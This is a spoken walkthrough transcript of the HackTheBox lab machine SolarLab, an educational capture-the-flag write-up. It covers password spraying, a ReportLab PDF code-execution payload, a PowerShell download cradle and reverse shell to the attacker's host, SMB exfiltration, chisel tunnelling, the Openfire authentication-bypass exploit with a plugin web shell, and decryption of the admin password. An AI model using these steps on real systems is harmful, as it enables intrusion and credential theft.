What's going on YouTube? This is Ipsec, and we're going to be doing SolarLab from HackTheBox, which has an overall theme of password reuse. It starts off with an SMB file share that allows for guest authentication and contains multiple files, one being a spreadsheet that has some user credentials. We can enumerate the username format by spraying a web login form with the usernames from the Excel, and then get additional users on the website with the improved user list. We can perform a password spray that enables us to log into the site as Blake. And this leads us to a PDF generator, which is vulnerable to a SSTI-like exploit that enables us to get a shell as Blake. And as Blake, we need to get over to the Openfire user. We can do this two ways. The first way being dump the passwords out of the website and then do a password spray and discover that there is password reuse to the Openfire user, or just find out the Openfire server is vulnerable to an authentication bypass. Either way, we get a shell as Openfire that enables us to read the database, and we discover the database is encrypting, not hashing passwords, so we can use a tool to recover the password, which is the administrator password to the box. So with that being said, let's jump in. As always, we're going to start off with nmap, so -sc for default scripts, -v enumerate versions, -vv for double verbose. This gives us the TTL and things like that. OA output all formats, put in the nmap directory and call it SolarLab, and then the IP address of 10.10.11.16. This can take some time to run, so I've already ran it. Looking at the results, we see 4 ports open. The first one being HTTP on port 80, and its banner tells us it's Nginx. And also it is redirecting us to solarlab.htb. So I'm going to go ahead and add this into my host file. So let's do sudo v etc host, and then we can add 10.10.11.16 solarlab.htb. And then looking at the other things, we can see there are 3 other ports opened attributed to SMB. That would be on port 445. And that's about it. We have the host scripts telling us the clock is 1 second off, but nothing really important there. So I'm going to start off by just running nxc to enumerate SMB, because SMB, we can't really do that much right away. So it doesn't take us long to enumerate versus web, which is just like an endless rabbit hole. There's always more to look at there, right? So I'm going to do SMB, netexec SMB 10.10.11.16, and that will tell us the domain of the box and host name of SolarLab. We can do the -- shares, and this is going to list the shares if we have access to. We have this error message here of error getting user. I always like testing with a guest account, so we can do -u guest. And then I also like just doing like an account with that's invalid. So with guest accounts, I guess you have to specify a blank password, and we see we do authenticate here, and it lists the file shares. We do have one called documents. You could also probably do like something for the username. I think it'll default to the guest if the account doesn't exist or something weird like that, right? So we can see it auths, it tells us guest, and the same exact thing. So we have this document share, and we have read access to it. So I'm going to do a -M spider plus, and this is going to create a JSON file of all the files on the document share. It by default ignores this IPC share because there's a lot of information that's really not that important to us, right? So we have saved the output to temp, nxc host, and nxc spider plus this .json. So let's move it here, and I'm going to call it like smp documents.json, just so we have what it's like, some context to the name. And if we look at this file, it is the document share, then we have the file name, and then a bunch of information about the files. I really don't care about this much, this timestamps that much. So what I'm going to do is I'm going to pipe it to JQ. I'm going to filter that out. So if we do a JQ, and then I just specify, or is it JQ dot? Yep. So we pipe it there, and we can say map _ values keys. And what that's going to do is it's going to take the top level thing, this documents, and then it's only going to list the value of it, which is to be 1 level. It's going to ignore all of this stuff, right? So if we do this, then we just have a clean format of all the files on it. You could also like do .documents to traverse that file share, and then say, is it keys, to just get the file names there. But I like the map values because it adds the share that it goes to. So we can see these files. I'm going to SMB mount this so we can download all the files. So So I'm going to do a make dir /mount/documents. We probably need to do that with sudo. And then let's do sudo mount-t, specify CIFS. We want to mount the 10.10.11.16/documents directory over to mount documents. And then the username password doesn't matter because we just want to mount as guest. And if we go into mount documents, we can see all the files here. So what I'm going to do is a recursive copy, and we're going to copy it to a current working directory. And I guess while that copies, we can go ahead and do a make dir SMB, and I'm going to move documents into SMB just to kind of stay organized. If we go in there, we can open up each document. And as I expanded my tmux window, I realized I do want to put SolarLab just on this host, right? Because when we ran nxc, where is it? If we go all the way to the top, we can see the host name and domain name. It did output it as SolarLab. So whenever I see a host name, I do like adding it into my host file. In like the real world, I probably wouldn't do this because I have things like DNS that do it for me. But in HTTP, we don't have a DNS server. So let's see. Now that I have that, let's go ahead and open the files. And before I even open the files, I like doing exif tool. So let's do details, file, xlsx. And what I'm looking for here is actual usernames or emails, right? So we just see Paul Sherbin here. We don't know the username. So I'd probably like take a note of the full names. So if I ever find out the username format, I would be able to play with it, right? So if we do exif tool, let's see what's the next one. Old leave. We have Alice and Melville. Also Jackie as a first name. Nothing too interesting there. If we go into concepts, there are two other ones. So let's do exif tool there. So training. I need to say the directory. Training request. Let's see, that is Wood Group. We have another name. This could potentially be a user. If we wanted to, we could test this out. So we could do nxc smb 10.10.11.16-u and then put a password that definitely is not the user's password. And if we get a failure, then we know that's a success. Since this just said guest right here, we know this account doesn't exist because we successfully authenticated it, moved us over to the guest account. Just a weird Windows quirk in how NetExec is displaying it. Because if we hit an account that does exist on the box, let's say administrator, because that's the default one, and then we put a password, we actually get the login failure message. So if we have an invalid username, we see success. If we have a valid username, we see fail. So we know that's not the user on the box. We could do exif tool in the next one, but no usernames are leaked, right? You get the point of what we're doing. So let's take a look at each of the files. So I'm going to open this. And what we have here is some usernames and passwords. So we have Blake Byte, Alexandra K, Claudia. So we could copy this and do, let's see, v users.txt. Put all of this. I'm going to get rid of the Gmail. Okay. And then let's grab the passwords as well. So v passwords.txt. And we're just going to keep a running list of passwords moving forward. We can do netexec again. So nxc smb 10.10.11.16-u users-p. I'm just going to put a bad password here. And we're going to see if any of the usernames do authenticate. And we have to do, what is it? -- continue on success, I want to say is the flag. Because by default, it's going to stop whenever it hits a successful one. And right now, we really just want to see a failure because that means we have a valid account. So nothing there. If you look at the other files like old leave, see if there's anything here. I don't think there's any other important files. So let's go ahead and move over to the web server. So if we go to 10.10.11.16, we get directed to solarlab.htb. and we just see this coming soon thing. And we also have a few names like Alexander Knight, Claudia Springer, and Blake Byte. We did see Blake Byte on the, users.txt. And if we wanted to, we could run like username anarchy and do other things, or just, we could probably enumerate users on this. Because we're getting a success here as a guest account. Let's just do guest again. Again, it doesn't really matter. Well, I guess guest will have to have a blank password. That's funny. Did not realize that. So guest blank password does log in. We can use the RID brute tool, and this is going to do a RID brute force to enumerate valid users. And this will tell us what usernames exist on the box. And we can see there's administrator, Blake, and Openfire. So all these are blank. So if we do v users.txt, let's add, let's go with, Blake, Openfire, and administrator. Administrator. Okay, I spelled that right. And now we can do a password spray. So if we do users.txt and password of passwords.txt, we may find a valid hit. And I'm also going to add the continue on success flag. So we keep going if we do hit one, because who knows, maybe we have multiple accounts, right? So it's trying the first password with every account, and we can let that go on. And we do have a hit of Blake right here. This can't be typed easily. Did that try all the passwords? Do we only have? Okay, I thought it would take longer. So we do have Blake's password right here. So I lied when I said we're going to go straight to the web server, right? So let's go and hit this. So if we grab this and then do -u Blake, make sure we get authenticated. Okay. We can do the -shares to see if there's anything else we have access to. We could run Spider Plus again, compare the results, but nothing's there. At this point, I would run things like RDP, WMI to see, or is it -u? Oh, RDP doesn't have a shares. I would see if there's other ways to access the box, right? And I'm also going to do a sudo nmap -p -min rate is equal to 10,000. Because I want to do a full port scan of this box to see if there's any other things running that nmap didn't pick up, right? Let's do 10, 10, 11, 16. That's the port. And we can add a -v flag so it shows us open ports as it finds them. I probably should have put that into an out file, but the main thing I'm looking for is like things like WinRM, are those ports open, right? So we're going to let that run. Looking through the website, it doesn't look like there's that much left. We have a newsletter. And then get in touch here. The copyright is 2015, so that is a old copyright. I may look for like super old vulnerabilities in the web server. We could see exactly like what it's built with. So the easiest way is just looking at like the site headers. So if we do a refresh here, setting it to Burp Suite, let's go here, repeater tab. We can see the server's Nginx, text HTML. Not really getting much information off of this. Looking at the cookies, no cookies here. Sometimes cookies tell you what the application is. We could try a 404 page to see what that says. We just get a standard 404 not found. So I don't know what the web server is coded in right now. So let's go ahead and look at port 6791. So that did come back. I didn't expect to see that. And whenever you approach these boxes, when I do my first nmap with the script scan, I don't like doing -p- because if you do, it will take a long time. But I always recommend just doing a full port scan in the background as you do other things, because you do see hidden ports from time to time. So I'm just going to curl it. We can see it does give us a 301 redirect. And it's directing us to report.solarlab.htb on port 6791. So let's go ahead and add this to our host file as well. So let's do a sudo v etc host, and then we can add report solar htb and take a look at what's there. So if we go back to Burp Suite, turn intercept off. We can say HTTP. Oh, it directed us. Sweet. We just have the countdown report. So if we do a report, it's directing us back here. That's funny. Is the redirect what we'd expect? Let's see. HTTP. I wasn't sure why that didn't go to Burp Suite that one time. Intercept is on. Okay, let's just manually type it. Send to repeater. We just get to move permanently. So nothing interesting there. But what we can do is specify, what is it, port 6791. And we get a login to ReportHub. So if we try logging in here, we get user not found. So if we have a valid user, I'm assuming this piece will change, right? We could try Blake, because we know that's a valid user on SMB. We still get user not found. So at this point, we have to figure out what the valid user is. And I probably should have left users.txt as I had it. So let's do, let's see, I'll call it all users.txt. I don't know exactly. So we can delete this. And then what we're going to do is feed all these users into this form to see if we get any hits. So I'm going to go over to Burp Suite. We can look at the history, and I'm going to grab a login request. So let's just copy this to a file, and then I'm going to put this in login.request. And we can edit this up. So we do v-login.request, and I'm going to do a fuzz where username is in all caps. This will let me use FFUF, and then we can send all the users through this. So if I do FFUF dash request login.request request proto HTTP word list, this is going to be all users.txt. Send this through. That looks fine. We could do a filter regex and then say user not found. Eyeballing this, I'm guessing these two are the unique ones. We see the size is 2144, but since the page tells us user not found, we could also just filter on that. And I thought we would. Why'd that get nothing? Okay. I'm not sure why it didn't work that first time, but we do see 2 hits, Claudia S. and Alexander K. So we could try spraying the passwords. And to do that easily, I'm going to actually give it to word list. So if I do all users.txt colon first, and then we give it a passwords.txt, I'm going to call this one second, it'll actually go into the word list and look for them both. So let's go back to login.request, and I'm going to replace fuzz with first. So we can do first here, and password we're going to replace with second. So let's run this again. And we get the output. This is not pretty. I'm also going to now do a filter size for 2144 because I'm assuming if I hit a valid login, it's not going to send me a page this size, right? And we get nothing. So we have to kind of go back and see if there's any users we missed. And if we look at the format, let's see, v all users.txt, it is first name, last initial. And what I want to do is see if it's case sensitive real quick. So let's go with Alexander K. Is it? Alexander K. Put something in. I'm going to turn Burp Suite off just so it goes a little bit faster. User authentication error. So let's do lowercase. I think I misspelled that. I should just copy this. Cat all users. We can copy this, paste, do it all lowercase, and we get user authentication error. So it is not case sensitive on the username. So we don't have to care about that. It's one of those things just always good to check. And I'm going to add Blake B because that's the other name we have here. We could also go back to the website and see Claudia S. We have her. Oh, Alexander Knight, that is the CEO. So these names are already there, right? So let's go ahead and run this again. And I guess if we really wanted to, we could get rid of the second word list and the size to see if that user existed. And Blake B does come back now. But running this again, we can see Blake's password is "this can't be typed easily," and it lets us log into ReportLab. So that's how you can use FFUF to just brute force simple login fields. If we go Blake B, type in the password, we get to this page called Welcome to ReportHub. And we have a few fields here. So if we look at this, we have a leave request, home office request, travel approval, training request. So let's just play with this real quick to see what happens. I'm going to give it 2 dates, test, and we need a signature. Let's see, this wants image. So I'm going to do locate -r GIF. Actually, I think I can just do echo, what is it? GIF 8 semicolon to test.gif file. Do I need the semicolon? There we go. So that's the MIME type for GIF image. So it's a simple way to do it. Let's go. Wait, what? Oh, I'm on desktop temp. Let's see. If we go IPsec HTB, what is the, or is it home HTB SolarLab? We can do test.gif there. And then let's upload this signature. So if we send this, we can look at what the form looks like, forward it along. Must be JPEG. Oh, that's annoying. Let's do this again. And I'm just going to copy a JPEG here. So let's do locate-r, JPEG, $. And then I'm going to copy this here. And we can upload verify.jpg. Generate PDF. And we have a PDF here. So let's look at the MIME type of this PDF. So I'm going to do, I guess we can save it to output.pdf. That's fine. And I want to see exactly how this is created. So if we do exif tool, we can see it's created by the ReportLab PDF library. So what I want to do is go to Google, and then let's search for ReportLab PDF exploit to see if anything comes up. And it looks like we do have a few. So going here, looks like there is a RCE vulnerability and just the PDF parsing engine. Let's see, do we have a payload here? It looks like we do. Saying this. We can try this payload real quick, see if this works. So let's go back to the page. Leave request. I can probably say HTTP history. Do we have a post? Let's intercept and do it again. This, that. Where was I? Travel I want. I just like having as many like free-form text as I can. Noticing there is a 300 character limit on the justification. Let's see, send verify. Let's, intercept is on. Generate. Send this to repeater. And we want to insert the exploit. So right here, we can do this. And here's where it's running this attacker command. I'm going to just do ping 10.10.14.8. And over on my box, we can do a sudo tcp dump -i ton 0 icmp. I'm also going to do a -n so we don't do any DNS lookups. And we send the request. We don't get any pings. I'm going to try a different field because I think I put more than 300 characters here. So let's just go to what it was. There we go. And if we look up, there is a text field here as well. So we can try the exploit in this one. And the page is taking a little bit longer to run because it is pinging us. So it looks like the exploit just did not work in the user input field because that's probably limited on the number of characters. But doing it on a different field, the travel request, it looks like that worked just fine. So what we have to do now is get this to execute code. So we have it pinging us. And my favorite way to do this is just creating a simple web cradle. So we can do vcradle, IEX, new object, if I can spell, net.web client, download string, HTTP 10.10.14.8, port 8000. I'm going to call rev.ps1, like that. And then we can say cat cradle. We want to put it in UTF-16 little endian format because that's what PowerShell wants it as before we base 64. I convert, I need -t for target. And we can copy this. And now I can just replace this ping with a PowerShell-enc for encoded command and put the base 64 there. So now we need to make a www directory and put a reverse shell in this. So I'm going to copy user share nashang shells invoke PowerShell TCP one line ps1 to rev.ps1. And then we can edit the shell to have our IP address and port. So we can do 10.10.14.8, port 9001. Save this. Set up a Python web service or Python 3 HTTP server. Then we can start up the reverse shell, LVNP 9001. I like doing RL wrap. This gives me the up and down arrow. And then send this. So sending it, I got a bad gateway and redirect. And we don't have any hits, but I'm guessing maybe our session died or something because I'm getting redirected to login. So let's go ahead and log into the app again. So let's go to SolarLab HTTP. We want to do, was it Blake B, and then the password, cat passwords.txt. This can be typed easily. Copy this, paste, log in. I'm going to go ahead and just grab the session cookie. And then we can replace the session cookie. It's taking its time. And we see we got a hit down here in rev.ps1, and then a connection comes in up there. So it looks like we have a shell. If I do a whoami/all, we can see, let's see, we are the Blake user. And we don't really have any dangerous privileges. Normally when I exploit a web server, I expect to get like SE impersonate, but that is not what we have here. I'm going to do a net user command. This is going to list other users on the box, just in case like our RID brute force from earlier missed anything. We don't see anything new. We could do, try to find where this database is. If we do dir on instance, we do have a users.db. So if I go into instance and we type this out, we see it's a SQLite, and we can probably guess the passwords here. Alexander K is probably this hot P FireGuard, but I'd really rather dump the SQLite database. I'm sure we could find a good way to do it on Windows, but I'm just more comfortable getting it over to Linux. So what I'm going to do is create an SMB share and then copy it to me. So we're going to do SMB. I'm going to make dir share, and I'm going to do a sudo npacket SMB server. We can say -SMB to support. And then I'm going to call this the share. And I'm going to say the share is at my current working directory. So here, now we can do the PowerShell command to mount the drive. So let's do new PS drive. And we can name it whatever we want. I'm going to be non-stealthy and call it exfil. We can say PS provider is going to be file system. And the root of that drive is over at 10.10.14.8/share. And looking down here, we see it connects. And here we have the location exfil is pointed there. So I should be able to just do a copy command now. So if we copy users.db over to exfil:, that's going to copy it over to this SMB share that I just mounted. So if we do SMB share, we have users.db here. So if we do SQLite 3 users.db.dump, we can get a better output. So we already had Blake's password. We have Claudia and Alexandra's password. So let's do v passwords.text. We can add that. And then we can also add this hot pi fireguard, I guess, or hot p. I don't even know how to pronounce that one. So add that. And then we could do netexec again. So netexec smb 10.10.11. What is it? 16 -u users.text -p passwords.text and continue on success and see if we get any extra hits here, right? We probably didn't need to do Blake again because we already know Blake's password. Could have removed it, but yeah. So seeing if we get any extra hits. And we do have Openfire's password. And this is actually unintended. We're supposed to get Openfire access another way, which I'll show right after we show this. I think it just flows better if we show doing enumeration as soon as we get new information and seeing this, right? So we have Openfire. So what I would do is, let's say, hot fire guard. And then what is the user? Openfire. We probably want to put that in quotes. So copy. Make sure everything's done right. Okay, so we could try that RDP again to see if we can RDP in. RDP and WinRM weren't exposed. We could try WMI, but we don't have any remote access with this user. So my first thought would be, okay, let's go ahead and do a netstat-an and then look at listening ports. We see there are like WinRM ports open, so we could potentially use Chisel to forward this. If we look at all the ports, we also see like 9090, 7070, all these ports are open. So we can forward the port. So let's go, actually before we forward the report, we could just run a tool called RunasC#. So if we go over to Google, let's say RunasCS, GitHub, and we're going to download this tool. So go here. And this just lets us run runas from a shell. We can't easily use runas from a reverse shell because Windows has some protections to prevent that. But the C# one lets us do that relatively easily. So let's go what I downloaded to. Downloads probably. So we can cp downloads. Did I put in downloads? Where are you? It's in SolarLab. Awesome. So let's do move. What is this? Run as here. Unzip the file. And let's just go cd exfil. And let's see, we can run files out of this probably. Yes, we can. So let's do runascs.exe, Openfire, and then the actual password. So that is the hot p1. I wonder if I should put that in quotes. There we go. And then we can just say run a PowerShell reverse shell to 10.10.14.8, port 9001. And let's see, it is taking its time to run. I'm guessing because it has to download the binary, but I think this will work. There we go. We get a shell as Openfire, right? So the other thing I want to do is see if we run chisel and forward the port, if we can do winrm after we do that. So let's go ahead and copy chisel. So I'm going to copy opt chisel exe over here, and we can say /chisel.exe client 10.10.14.8 port 8001 are socks. So we're going to do a reverse socks shell, and then we want to run chisel. So I'm going to do opt chisel server reverse sock5 port 8001. And I think my port is wrong there. There we go. So chisel's listening. We run chisel. And it's going to take, again, a couple seconds to copy the binary over to the box. If we had downloaded it locally, this would be instant, but hopefully it works. I'm guessing it may just take a little bit longer. I'm getting a little worried that I don't see anything pop up here. And there we go. We have session 1 has been opened. So let's go back over to this pane. And I want to look at my proxy chain configuration to make sure I am doing SOCKS5 on port 1080. I am. So let's do proxy chains, evil. Do I have evil winrm installed? I do. Okay. I'm surprised tab autocomplete wasn't working. -I. I'm going to specify 127.0.0.1 because that should go through proxy chains and hit localhost. -user. Let's see, cat users. This was Openfire. And -p. That's cat passwords. And grab this. Paste that. And see if we can get proxy chains working to get a PowerShell remote shell. I actually haven't tested this, so I don't know if it's going to work. I'm just thinking of other ways we could get this remote access as Openfire. It does not look like it is, which I'm a little bit surprised about, but I guess not really. Maybe winrm remoting is not enabled for Openfire users. So yep, authorization error. So I think the only way we can get the shell from Blake is to use that RunasCS command, right? But these are just other things you can try. So the intended way is we have that proxy running and we want to see what's running on the other ports, right? So I'm going to tell my browser to go through SOCKS5. And if I do HTTP 127.0.0.1 on port 9090, we get this Openfire console. And it tells us the version 474. So if we look for exploit 474 Openfire, I probably have to turn the proxy off. Let's see. Openfire 474 exploit. So I'm going to find a write-up, but we just, I guess, have this GitHub thing. Let's see. Let's see exactly how this works. This is doing 471. Is this the exploit? It is. So this script's going to get us a shell, and it's also going to do the next step for us, and that is upload a malicious plugin. But I want to look at exactly how this exploit works because it's somewhat interesting. When I first started looking at it, I was like, what the heck is this, right? It is Unicode URL encoded ... I'm not used to this actually working. I'm guessing it's because it went into a custom web server. Like Nginx, I think, will normalize it by decoding it to UTF-8. But if we do a search on GitHub, let's do Openfire. and look at this. Let's see if we can find an issue really quick. So let's go over to PRs. I'm just going to search for the CVE to see if there's any mention of it. There is not. Let's see, Unicode, Spark. Let's see. I don't see. This is probably the fix to it, but it's not exactly what I was after. So let's go back to PRs. We can delete everything. And let's see. I'm going to go and look at when the CVE was. So if we go to Google, search this CVE, looks like May 26, 2023. Is that the patch? Oh, we could probably search by release and look at this. This will probably help us. So from to 475. So what we could do, instead of looking at issues first, go over to releases, look for 475, and then look at the tasks. Improve detection of path traversal. This is probably going to be it. And yes, this is it. So the implementation of the auth check filter attempts to guard against path traversal, but it didn't do UTF-16 encoding. And eventually, the web server added the feature to do UTF-16, which broke their previous filter because it wasn't looking for it. And I always like looking at the bug reports because you learn other things, right? We have this Unicode 002E, which is what the exploit's using, but it does call out other ways to do it. So like 252E double URL encode, UTF-8 Unicode encoding. So it shows other payloads that may work. So I always learn a lot when I just see like the fixes to things, right? And if we wanted to, we could even go in the code itself and look at exactly how they fixed it and how it became a thing. So I'm going to grab this auth check filter and let's find this file. So let's go back to the exploit. I'm going to leave that in a tab. Openfire. Let's see. So easy way to find this. I think because I'm not logged into GitHub, it's not going to find this quickly. I'm going to pause the video and log into GitHub so we have a bit easier web interface. Okay, now I'm logged in. I can now search for the auth check filter and then go to the file that is specified. And before just looking at the file, I always like going over to the history because we can look at the actual commit history and find out when it was fixed, which gives us pretty much the exact line, right? So we see all these OFs, which I don't know if that's open for discussion or old feature, probably open for discussion. Just weird terminology. Let's see. There we go. Encoded dots. So it's one of these. Omits UTF-16 encoded dots or added check for encoded dot as well. I'm guessing both of these are part of the fix, right? It's probably that cat and mouse game. Right now, they're only looking for Unicode ... I'm guessing this one adds a bit more, right? So they decode the URL and then they create this big deny list of characters. And what I find interesting is if we look at exactly where this function is, the name of it, we can look at like the current implementation and you can see like the improvement over time. The first one, they only look for the reported vulnerability. The next one, they were like, oh, wow, it could have also been all of these, right? It could have been a different way of doing Unicode, right, as we saw in the ticket. So I'm going to look for this test URL pass exclude function. And then we're going to go to the latest version of this file. Maybe if I go back, am I here? I think I am. So let's search for a test URL pass include or exclude. And we don't see any of those percent dot dots that we saw on this, right? Decode URL contains percent 2e. We don't see that. And the reason we don't is it changed to say the URL decode is going to be UTF-8. So this way, if it comes across UTF-16 characters, it's going to make them UTF-8 to begin with, right? So they only have to, again, check for dot dot because UTF-16 characters get auto-translated to UTF-8. So that is probably the proper way to fix it. So that way other obscure encoding methods don't get in. And if there's like, maybe there's UTF-32 or something crazy that gets implemented in the future, they don't have to go back because they're telling it, I want it to be UTF-8. So I always like just looking at how things are patched and seeing the different ways because you do learn things. And then also when you're writing recommendations, you have a better understanding of how things have been patched historically. So you can do better reporting, right? So with all that being said, let's go ahead and take a look at the exploit. So it looks like we abuse a route. So if the setup S is allowing an unauthenticated user to hit it, and then we do dot dot. So we get out of the like authentication router as a user, and then we can hit this user create JSP function. And if we didn't do the dot dot, if we just went target user create JSP, it requires authentication. But because we're coming from the setup directory, we don't need auth. And it looks like the exploit is just going to create us a user. And then after the exploit, it's going to log in and do something for us, right? So I'm going to go ahead and download this. So let's go to copy raw file. Let's do v-exploit.py, paste this in, Python 3 exploit. No module named hack request. I don't know if I like this one. If I have to like, what is a hack request? What the? Probably shouldn't be installing this, but it's on pip, so I guess I trust it. What is hack? That's a new one. Let's see. I wonder if like the Python request library would automatically like do some of the decoding for you, so you couldn't put the UTF-16 thing in the regular request library, and this hack request is a workaround that. I'm not sure, but okay, we have hack request now. Let's see, we can do target. So if we do target, was it 10, 10, 11, 16? Oh, let's see. It's actually 127.0.0.1, port 9090. And we want to proxy chains it. And if this doesn't work, we probably have to edit the exploit script to include a SOX proxy is my guess. Let's see. Yeah, so let's do V. I'm going to open up in Visual Studio Code. This will just give me like the auto output thing. Let's see, exploit.py. Let's see. Hack dot. Does it have a proxy? Why is it not auto-completing for me? Let's see. How do I set the proxy on this? Oh, this is not a session object. This is just initializing the library. I thought this would be a session, so everything like after it would take effect. Maybe it just takes the HTTP environment variables. That may be an easy way to do it. Let's do HTTP proxy is equal to HTTP 127.0.0.1 port 8080, and then Python 3 exploit.py -t and this. And I'm going to intercept and burp. And I know I'm sending it to burp, which is not configured to use the proxy right now, but hear me out. I do want to see if this works. Did that not go through burp at all? It doesn't look like it did. Okay, so we probably have to set the proxy in each request. Proxies. That was HTTP, right? Yep. Is equal to HTTP localhost 8080. And then hack.http proxies equal to proxies. And we got to see every other request. Add it here. Oh, there's only 2 spots. Okay. I thought it was automatically adding the plugin. This looks like it just generates the user. So that should be fine. Let's go over to Burp Suite, proxy settings. There should be a SOCKS proxy here, right? A network, connections, SOCKS proxy, 127.0.0.1 Let's use this. Okay. So hopefully, why does that not work? Proxy chains, curl. Is my like chisel down? Chisel is dead, I think. That is bizarre. Yeah, I'm not listening. Okay. Let's start chisel back up. And that's probably going to take 10 to 15 seconds for this to open a new session. And there we go. We have session 2 open. So now if I run this, that's looking better. So at least I can curl. Let's see, can I do this? Exploit. HTTP proxy is equal to localhost 8080. See, there's no way it died again. See, did I specify localhost? I am feeling like I'm crazy. Let's hack HTTP. It should be using this proxy. Did I not save it? Okay, proxy chain isn't it worked. I don't know what I was doing wrong there. Maybe that hack request doesn't have like set the proxy the way I'm thinking it does. But we have the J session, this here, and the username has been added. We have 4QW7B1 and this. So we should be able to log in here. So let's go and log in. And I think at the end of the video, I'm going to go back and we're just going to exploit it manually because I really, really do not like what I did here. But let's just go forward. So we can log in. Let's see, there's that. There's this. Okay. We go to the GitHub repo. Where was it? This. I think it tells us exactly how to use the exploit. And I probably should update my Foxy proxy so I don't have to keep switching between this. But we log in, we go to this, upload the jar, and then access the web shell. So we've logged in. What did it say? Plugin, upload plugin. So plugins. is going through socks. Did not die yet. This is just, I guess, slow. And there we go. I'm on the plugin page. We can upload. Let's go to HTTP, SolarLab, and then it's in the CVE directory. Did I only download the exploit? I think I did. So let's go and clone this. So copy the URL, get clone. There we go. And then let's go and find that plugin. HTTP, SolarLab, CVE, plugin.jar, upload, and my proxy died. So what I'm going to do is I'm going to copy chisel.exe to program data, because I'm guessing Chisel does not like running off this SMB share for whatever reason. That's the only thing I can think of why it's dying, because I normally haven't experienced that. Let's go C:, program data, run this chisel command again, and we should get the connection back almost instantly. Did it not copy? Copy exfil chisel.exe. There we go. I probably didn't specify C: when I did the copy before, right? Yeah, I just tried to copy it to program data on the SMB share. So that was a mistake there. Looking in, yes, almost instantly we get the socks callback. I'm hoping this makes it go much faster. Resend the data. There we go. We have the management tool there. So let's see, how do we trigger that again? It's been a while since I did this. Server settings management tool. So server. Maybe this is just slow altogether. Okay. Where is it? Server settings. And then management tool. The last one. What was the password? 123. Log in. And there we go. We have the web shell. So with this, we can do a system command and then get the shell. So we could do PowerShell, encoded command. And what was that? Let's see. We can cat cradle, split the window. We want to go in www, set up a web server, nclvnp 9001. iConvert-t utf 16 little endian base 64 w0, and I always put the echo at the end, because if I don't, then my terminal goes on the same line. It's just annoying, but that's why I am putting that :echo at the end. Run this command, and we should see a hit here and then a shell here. And as always, I'm going to RL wrap this, execute. Let's see, it's taking its time. It's thinking. The proxy is still up. I think this web server is just, something is going on. I don't know exactly what, but every request seems to be taking longer than it should. See, I probably should send that to Burp Suite or something and get a better glimpse, but I'm going to pause the video and we'll see if it eventually makes its way back to us. And almost as soon as I pause the video, we got a callback. So we can go here and then we do who am I? And we see we're Openfire. So you could have either just done the RunasCS to get this access or exploited the web server. It really doesn't matter what. I always like when there's multiple ways to show the value of recon, because sometimes you can skip steps. So as this user, let's see if we can find the Openfire database, because that's generally what we do when we exploit web services, is we always like looking at the database and exfilling the passwords, right? So there is an embedded directory or embedded DB directory. So let's take a look here. If we do a dir here, we see openfire.script. So let's view this file. And it looks like just a database output, right? So if we look at this, let's see. This is audit log. We probably don't care about that. Let's go up. We have this OF user table and then a bunch of odd fields. So I'm going to copy this line real quick. So let's go to the start, then mark it for a copy. There we go. V user.text, and we will paste. And if we look at all the values, and I like disabling wrapping for this so we can go across, we can see admin, then we have something, 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 a number, null, and then something else that looks like a hash. So if we copy that, let's see. This echo-n, wc-c, we get 112, which that is odd. And that doesn't line up with like any hashing formats I know, like SHA-1, some SHA, whatever. Like it's an odd number. Let's go and let's see. Can we go to like hash identifier? Maybe I'm wrong and that is not as odd. We can always look online real quick. Hash type identifier, let's see. Is this going to be online? It is. Submit. Can't identify anything. Okay, so that is as odd as I thought. So let's look at what those values could mean. So that was what, OF user? And let's see, here's where we're creating the table. So I'm going to do the same thing and copy this line. And we can do v user table dot text. Probably should call it like OF user to keep it consistent. Let's see. I'm actually going to cat this. It's not as easy to read as I thought it would be. Let's just do sed on comma, replace it with a new line. There we go. That's easier. So we have username, then the stored key, the server key, the salt, the iteration, the plain password, the encrypted password, name, and whatever. So let's open it this way. Cat user.text. And then we can copy this sed rule. Okay. So that's the username. This is going to be off by 1 because that's not null. Is that better? No. That's a pain. Oh well. Username. Then we have the stored key, the server key, the salt, iterations, plain password, encrypted. So this is going to be the encrypted password. And whenever I see encrypted versus hashed, I think it can be reversed. So if we Google Openfire decrypt password, we go to this tool. And they have discussion here. We run Java. The program looks like the hash and then something else. If we open the actual source code, it kind of explains it a bit better. Please enter the encrypted password and the password key. So there's a secret key in this database that it's using to decrypt. And if we search for password key, we get this string. So, and I'm sure there's a blog post that kind of explains this in depth, but this is a decent way. Let's go and grab that hash again. Do I have it here? Let's see, would I put that? vhash.text. Okay. So let's clone this repository. Openfire decrypt, git clone. And then it wanted to do Java C to compile it. And then we execute it. Let's see. So we just do Java, Openfire pass like that. And then we got to pass it the key and hash. So let's grab the hash and then grab the key. And we get this password should do. And let's see if we cat that user again. That is the password for administrator. So we can do nxc, smb, 1010, 11, 16, administrator. This password should do -u -p. And it says pwn. So we hopefully can just run psexec.py administrator :password. We can do this in quotes. Oh, that's a pain. The password has an @ I wonder, do we escape in that case? Like that? Because @ is generally how you specify the target, right? 10, 10, 11, 16. Let's see. Let's do this. And then we can copy and paste the password. So we don't have to worry about escaping it. Requesting shares, uploading. And then we're NT authority system, so we can go users, administrator, desktop, and get root.txt. So that's going to be the box. I do want to just take a step, go back real quick, and do that Openfire exploit another way, because I really, really did not like having to install that hack tool library. That was odd, right? So let's log out of here. Unable to connect to server, burp suite. This should be configured to go to the proxy, right? If I do this, connections, use socks proxy is checked. So if I go burp suite, history, it's loading. Did not get the response yet. Chisel is still up. So since switching off of running it off a SMB server, it's definitely been more stable. So there we go. Okay. So let's look at this CVE, right? I don't want the jar. Let's go over here. And we'll just manually make the request, right? It shouldn't be that tough. It's famous last words, I guess. So the first step, let's get a request into repeater. And this is in proxy mode, disable, so we can open this. Okay. So what do we do first? We hit this URL. So we do target and hit this page. Okay. See, is it setting any important headers? I don't think so. I don't think the headers matter here, right? That looks fairly standard. Hack HTTP, and it wants to get a JSession cookie. Let's see, we get the CSRF, server error. So that did not exactly work. Let's see. User groups. don't think the exported for would be important, right? See, I wonder if I gave it a cookie and I don't want a cookie. Okay, so we get a JSession cookie back and we get the CSRF. It does error, which is interesting, but I think everything is going fine. So let's make this one get JSession and then look at the next request it makes. So this looks like a similar thing. We paste the cookie and CSRF. So let's go here. And this is in cookie. So we can say cookie JSession ID is equal to this. I want to say it's semicolon to delimit. CSRF is equal to this. Okay. And we actually hit user create and then pass it variables. And this still looks like to be a GET request. So we can paste this. CSRF. Then let's do username is equal to IPsec. Password can be password, that's fine. And this, I don't know exactly what those fields are. Decoder, smart decode, not sure. But it's all hard-coded. So if I send this, is it going to work? Exception, null pointer. I don't think that worked. Let's see. Socks 5, IPsec, password. And it's thinking about it. And we're in. So even though we got the null pointer error, it looks like it still worked and created the account to let us log in. So I 